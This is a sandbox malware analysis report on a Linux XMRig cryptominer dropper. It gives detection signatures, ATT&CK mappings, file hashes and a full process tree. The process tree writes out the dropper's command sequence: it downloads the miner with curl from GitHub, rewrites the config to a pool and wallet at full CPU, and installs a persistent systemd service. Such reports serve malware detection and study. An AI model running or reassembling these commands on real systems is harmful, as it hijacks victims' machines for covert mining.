xmrig_linux | cef2707760086718175235810e3e49a7bbfedce482dee09eef3d302247e97142

Analysis

max time kernel
3s
max time network
135s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240226-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
10-04-2024 14:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cef2707760086718175235810e3e49a7bbfedce482dee09eef3d302247e97142
Size

8KB
MD5

bcf76b649b5c6016b4071d197b1ce111
SHA1

f4bb851898a35378e6856181cb1ffc18436ed50b
SHA256

cef2707760086718175235810e3e49a7bbfedce482dee09eef3d302247e97142
SHA512

e35efea83573b47adf7464dfdb7b20b86e5f27df8aaef336947c278e48b38b9c955ce97d9583521d7a581c30b0f2a832c5e1b78f2825bb1af99948c4ed2b153e
SSDEEP

192:76l+8H8cGom5Ca3knBdVdlfb0iA98sdrUtvwZMIKopVVFoGpKueJAYdtoEDdUlpW:oAom5ChBv0irsdrUtIZMIXpLaKKueJLJ

Score

10^/10

xmrig_linux antivm miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

Executes dropped EXE 1 IoCs

ioc	pid	Process
/root/moneroocean/xmrig	1597	xmrig

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/proc/cpuinfo	xmrig

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	xmrig

Enumerates running processes
Discovers information about currently running processes on the system

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Reads CPU attributes 1 TTPs 45 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/cluster_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/possible	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	xmrig
File opened for reading	/sys/devices/system/cpu/online	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/thread_siblings	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_siblings	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	xmrig

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_name	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	xmrig

Enumerates kernel/hardware configuration 1 TTPs 22 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/kernel/mm/hugepages	xmrig
File opened for reading	/sys/devices/system/node/online	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/access1/initiators	xmrig
File opened for reading	/sys/devices/virtual/dmi/id	xmrig
File opened for reading	/sys/devices/system/cpu	xmrig
File opened for reading	/sys/devices/cpu_atom/cpus	xmrig
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/cpumap	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators	xmrig
File opened for reading	/sys/bus/soc/devices	xmrig
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.cpus	xmrig
File opened for reading	/sys/bus/dax/devices	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	xmrig
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	xmrig
File opened for reading	/sys/devices/system/node/node0/meminfo	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	xmrig
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	xmrig
File opened for reading	/sys/devices/cpu_core/cpus	xmrig

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/956/stat	killall
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/115/cmdline	killall
File opened for reading	/proc/158/stat	killall
File opened for reading	/proc/532/cmdline	killall
File opened for reading	/proc/1347/cmdline	killall
File opened for reading	/proc/155/stat	killall
File opened for reading	/proc/718/cmdline	killall
File opened for reading	/proc/1569/stat	killall
File opened for reading	/proc/339/stat	killall
File opened for reading	/proc/1081/cmdline	killall
File opened for reading	/proc/1334/stat	killall
File opened for reading	/proc/1058/stat	killall
File opened for reading	/proc/1287/cmdline	killall
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/19/stat	killall
File opened for reading	/proc/1/sched	systemctl
File opened for reading	/proc/1/stat	killall
File opened for reading	/proc/1054/stat	killall
File opened for reading	/proc/165/stat	killall
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/31/stat	killall
File opened for reading	/proc/24/stat	killall
File opened for reading	/proc/31/stat	killall
File opened for reading	/proc/631/stat	killall
File opened for reading	/proc/sys/kernel/osrelease	systemctl
File opened for reading	/proc/256/stat	killall
File opened for reading	/proc/1183/stat	killall
File opened for reading	/proc/462/stat	killall
File opened for reading	/proc/1141/cmdline	killall
File opened for reading	/proc/1164/cmdline	killall
File opened for reading	/proc/158/stat	killall
File opened for reading	/proc/160/stat	killall
File opened for reading	/proc/21/stat	killall
File opened for reading	/proc/1565/stat	killall
File opened for reading	/proc/1232/stat	killall
File opened for reading	/proc/driver/nvidia/gpus	xmrig
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/115/stat	killall
File opened for reading	/proc/479/cmdline	killall
File opened for reading	/proc/513/stat	killall
File opened for reading	/proc/1245/stat	killall
File opened for reading	/proc/34/stat	killall
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/1119/cmdline	killall
File opened for reading	/proc/1/sched	systemctl
File opened for reading	/proc/25/stat	killall
File opened for reading	/proc/513/stat	killall
File opened for reading	/proc/4/stat	killall
File opened for reading	/proc/11/stat	killall
File opened for reading	/proc/509/stat	killall
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/479/stat	killall
File opened for reading	/proc/1177/stat	killall
File opened for reading	/proc/132/stat	killall
File opened for reading	/proc/446/stat	killall
File opened for reading	/proc/645/stat	killall
File opened for reading	/proc/1284/cmdline	killall
File opened for reading	/proc/1172/stat	killall
File opened for reading	/proc/23/stat	killall
File opened for reading	/proc/956/stat	killall
File opened for reading	/proc/458/stat	killall

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/xmrig.tar.gz	curl
File opened for modification	/tmp/sh-thd.XLK7FF	Process not Found
File opened for modification	/tmp/moneroocean_miner.service	Process not Found
File opened for modification	/tmp/sh-thd.WmeysG	Process not Found

/tmp/cef2707760086718175235810e3e49a7bbfedce482dee09eef3d302247e97142
/tmp/cef2707760086718175235810e3e49a7bbfedce482dee09eef3d302247e97142
1⤵
PID:1569
- /bin/hostname
  hostname
  2⤵
  PID:1570
- /usr/bin/nproc
  nproc
  2⤵
  PID:1571
- /bin/sleep
  sleep 2
  2⤵
  PID:1575
- /usr/bin/sudo
  sudo -n true
  2⤵
  PID:1584
- - /bin/true
    true
    3⤵
    PID:1585
- /usr/bin/sudo
  sudo systemctl stop moneroocean_miner.service
  2⤵
  PID:1586
- - /bin/systemctl
    systemctl stop moneroocean_miner.service
    3⤵
    PID:1587
- /usr/bin/killall
  killall -9 xmrig
  2⤵
  - Reads runtime system information
  PID:1588
- /bin/rm
  rm -rf /root/moneroocean
  2⤵
  PID:1589
- /usr/bin/curl
  curl -L --progress-bar https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.tar.gz -o /tmp/xmrig.tar.gz
  2⤵
  - Writes file to tmp directory
  PID:1590
- /bin/mkdir
  mkdir /root/moneroocean
  2⤵
  PID:1592
- /bin/tar
  tar xf /tmp/xmrig.tar.gz -C /root/moneroocean
  2⤵
  - Reads runtime system information
  PID:1593
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:1594
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:1594
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:1594
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:1594
- - /sbin/gzip
    gzip -d
    3⤵
    PID:1594
- - /bin/gzip
    gzip -d
    3⤵
    PID:1594
- /bin/rm
  rm /tmp/xmrig.tar.gz
  2⤵
  PID:1595
- /bin/sed
  sed -i "s/\"donate-level\": *[^,]*,/\"donate-level\": 1,/" /root/moneroocean/config.json
  2⤵
  PID:1596
- /root/moneroocean/xmrig
  /root/moneroocean/xmrig --help
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Checks hardware identifiers (DMI)
  - Reads CPU attributes
  - Reads hardware information
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:1597
- /bin/sed
  sed -i "s/\"url\": *\"[^\"]*\",/\"url\": \"gulf.moneroocean.stream:10001\",/" /root/moneroocean/config.json
  2⤵
  PID:1603
- /bin/sed
  sed -i "s/\"user\": *\"[^\"]*\",/\"user\": \"438ss2gYTKze7kMqrgUagwEjtm993CVHk1uKHUBZGy6yPaZ2WNe5vdDFXGoVvtf7wcbiAUJix3NR9Ph1aq2NqSgyBkVFEtZ\",/" /root/moneroocean/config.json
  2⤵
  PID:1604
- /bin/sed
  sed -i "s/\"pass\": *\"[^\"]*\",/\"pass\": \"ubuntu1804-amd64-20240226-en-13\",/" /root/moneroocean/config.json
  2⤵
  PID:1605
- /bin/sed
  sed -i "s/\"max-cpu-usage\": *[^,]*,/\"max-cpu-usage\": 100,/" /root/moneroocean/config.json
  2⤵
  PID:1606
- /bin/sed
  sed -i "s#\"log-file\": *null,#\"log-file\": \"/root/moneroocean/xmrig.log\",#" /root/moneroocean/config.json
  2⤵
  - Reads runtime system information
  PID:1607
- /bin/sed
  sed -i "s/\"syslog\": *[^,]*,/\"syslog\": true,/" /root/moneroocean/config.json
  2⤵
  PID:1608
- /bin/cp
  cp /root/moneroocean/config.json /root/moneroocean/config_background.json
  2⤵
  PID:1609
- /bin/sed
  sed -i "s/\"background\": *false,/\"background\": true,/" /root/moneroocean/config_background.json
  2⤵
  - Reads runtime system information
  PID:1610
- /bin/cat
  cat
  2⤵
  PID:1611
- /bin/chmod
  chmod +x /root/moneroocean/miner.sh
  2⤵
  PID:1612
- /usr/bin/sudo
  sudo -n true
  2⤵
  - Reads runtime system information
  PID:1613
- - /bin/true
    true
    3⤵
    PID:1614
- /bin/cat
  cat
  2⤵
  PID:1618
- /usr/bin/sudo
  sudo mv /tmp/moneroocean_miner.service /etc/systemd/system/moneroocean_miner.service
  2⤵
  - Reads runtime system information
  PID:1619
- - /bin/mv
    mv /tmp/moneroocean_miner.service /etc/systemd/system/moneroocean_miner.service
    3⤵
    - Reads runtime system information
    PID:1620
- /usr/bin/sudo
  sudo killall xmrig
  2⤵
  PID:1621
- - /usr/bin/killall
    killall xmrig
    3⤵
    - Reads runtime system information
    PID:1622
- /usr/bin/sudo
  sudo systemctl daemon-reload
  2⤵
  PID:1623
- - /bin/systemctl
    systemctl daemon-reload
    3⤵
    PID:1624
- /usr/bin/sudo
  sudo systemctl enable moneroocean_miner.service
  2⤵
  PID:1645
- - /bin/systemctl
    systemctl enable moneroocean_miner.service
    3⤵
    - Reads runtime system information
    PID:1646
- /usr/bin/sudo
  sudo systemctl start moneroocean_miner.service
  2⤵
  PID:1667
- - /bin/systemctl
    systemctl start moneroocean_miner.service
    3⤵
    - Reads runtime system information
    PID:1668
- /usr/bin/tail
  tail -n1 /etc/rc.local
  2⤵
  PID:1670

/usr/bin/bc
bc -l
1⤵
PID:1574

/usr/bin/cut
cut -f1 -d.
1⤵
PID:1601

/bin/sed
sed -r "s/[^a-zA-Z0-9\\-]+/_/g"
1⤵
PID:1602

/bin/hostname
hostname
1⤵
PID:1600

/usr/bin/awk
awk "{print \$2}"
1⤵
- Reads runtime system information
PID:1617

/bin/grep
grep MemTotal /proc/meminfo
1⤵
PID:1616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/root/moneroocean/config.json

Filesize
2KB

MD5
f3294129e6b76283965ad86a815bf383

SHA1
5fe0ab538f86962efe82cb13fc2da745610740af

SHA256
578386126ae451940ff5c21ce95b4e3be85c2d33160d6e739ed0ebbd206c7e81

SHA512
07a280be17282096ed8c319623d2e02e088e80d69e3d6d24ecaef5bedf624d006dc4963b8b1a6c0569a3c9221786bfd7cd462dddebcfcbed7879fd994b4c8333

Download Submit
/root/moneroocean/sedGxfFfC

Filesize
2KB

MD5
4bea0cf8feb1350b32743cf0bd47ed6e

SHA1
515df666312aa58695a55fe09f0d98a51b01e2d8

SHA256
dfc341c9c7081a4399f6060cca3d14e633f10bce4167f4f0499948afa48c381f

SHA512
b4abf385397ad5bce539cdd2ae5223725a68153877ac48a137d835651af4f36f118b03a97db26744ae387ef206f8d88872064b0c0da63ccd114afd8a25cc86c0

Download Submit
/root/moneroocean/sedKyzniF

Filesize
2KB

MD5
c5ac7821ce7e2903b9b26765127f967e

SHA1
3bc130ebf60b4607564b148c5455b7a267efc367

SHA256
cf9bd638b7b87db7d8677f0e0eca136b57c51b0aca258c341e0e8abc1ebef046

SHA512
d2b8961be59f8a5051ed893194d2599733a78f60d5c6b9481bb9b767c7e224f3cda4f5d4ebbe14cdb148ab88e916c46a16f6adbad5d92c1b095e5733518e315d

Download Submit
/root/moneroocean/sedkuhLmD

Filesize
2KB

MD5
d489ddbbb83271e967b8af615d17d3c7

SHA1
f0394a367a60e9727269882154098dec802774ef

SHA256
5cf89bb7fbef53cc5fbe582017145aa148ad8a8abc5bceee9f887ba4a6fcc46e

SHA512
aba9bf29076f1d5b6e81c83e5be1cee5934d23db9093ec3ea8b4d92b521e37e58d80aaea6248dc211544574f3772df990950b9236f40e863a76220f86b157954

Download Submit
/root/moneroocean/sedptmIWB

Filesize
2KB

MD5
57cfbb69f930d299b808915235ff2914

SHA1
1c289fb6ca40d998598e4b17ce86c0820a64c036

SHA256
30e0d03956f55ec8603ba763695a9b43ec2a22ba58c43005d98f6324ae97601f

SHA512
bb69437bb59da59d578b89a1b2002c8e0e517852d699d8b125f193203690a7e77e1556d2c91f6bd6d33cdf44821609bc9844e8a4cc343c93bee49f91616f4523

Download Submit
/root/moneroocean/seduRpBJF

Filesize
2KB

MD5
7791f27ec5a8f545df2cc6dcea0f3343

SHA1
1064111d664322006ae3a558aba24344a9e9cf24

SHA256
66c416c09f11785ae1fb199eb2a85ca7f0cfafc7cbd421f8a56720898046d073

SHA512
79d81ad5a5c9047504475db11ba34a70d99762b0529f16a38314d59313af557e8516c41c4344d5353c97f4f97e665e5352c53c20e955b3245b965b1f2fa7eccd

Download Submit
/root/moneroocean/sedyJ7HXC

Filesize
2KB

MD5
759029a23434f60e3ad0a42507e3dd7a

SHA1
0ee346084373bad17683f8abe62f56de706f6515

SHA256
50dda334d2baec588e62d52348660d9938770886532f57fafc35aa3e31a5d618

SHA512
60c7eb01da0bafeb61b24575698d31d81e4d3ca9d6aeaeadf1ccc35015c8ab1a0e8b9ffdc7c25268f6d6b6b5ded66ff08adce0a8589c4f58ffdf9bb394c13a4f

Download Submit
/root/moneroocean/xmrig

Filesize
8.4MB

MD5
29f17d8ba09b7e49cab5460f32fd0b5a

SHA1
b8a100b384e5f153837b4e1f339544537a28aa8f

SHA256
be99204ec45ab090951647300cc5212bb770bbcb247e8ffd71de6230a571e370

SHA512
b0b4a386caea0e219426a6314bfd27ff66f8498ae5d0c563223eb366dbc1dd020940c93b23dcf2f42a3a5f5f36e152058d79b73abb8ff5c714b59ccbc05eca51

Download Submit
/tmp/moneroocean_miner.service

Filesize
197B

MD5
d0284207783e7503b11c45bc6d3f768e

SHA1
8297f50cb6bcc0233f19ec1fdfe11821db59168e

SHA256
25a08e28ef3b6c16dd9b1f72916cc115f75e657349dc2366c00c548154141d87

SHA512
011c5d2f5b6ed43341f1f84cbfd5a1bec398d1d08ab2c163b5e45086b0aa5674f529208230522814993e42ec8d64e8955c129d7118d4b03ca6cddf819cdc2327

Download Submit
/tmp/sh-thd.XLK7FF

Filesize
280B

MD5
40454a6347bc3eb738314abb6e4e95ec

SHA1
07436431814fcf82bd17acc480015572913a68aa

SHA256
a63ddceb8a1d14611b06e22092a30cb29ac118433215fbf7a1a41bbc9a098caa

SHA512
1bf7a2dcf278313ef9914376e8c3aef456091068798e5ed9004092028c523fb8240220fe06c9222e29907bfeabddbdb468478a6071f76bce6275f84b823c74c0

Download Submit
/tmp/xmrig.tar.gz

Filesize
3.4MB

MD5
26d59b20b8c7337ee2f3ad10ae40b0d1

SHA1
29995670a55b629cacc4ff827288f7f397c47e1d

SHA256
09504b25b89ab873489b0b98416327cc2e4fb5749c2da3f9f07d6a977bdb6dab

SHA512
00c85389abf1c96f20e9c21c74c6daac5f6f6b3c33adb0f96a579a861fa35e145a1f0549a61e41b568826d378e05858d21d0e414db67be6c3bf6a30706e65a4a

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads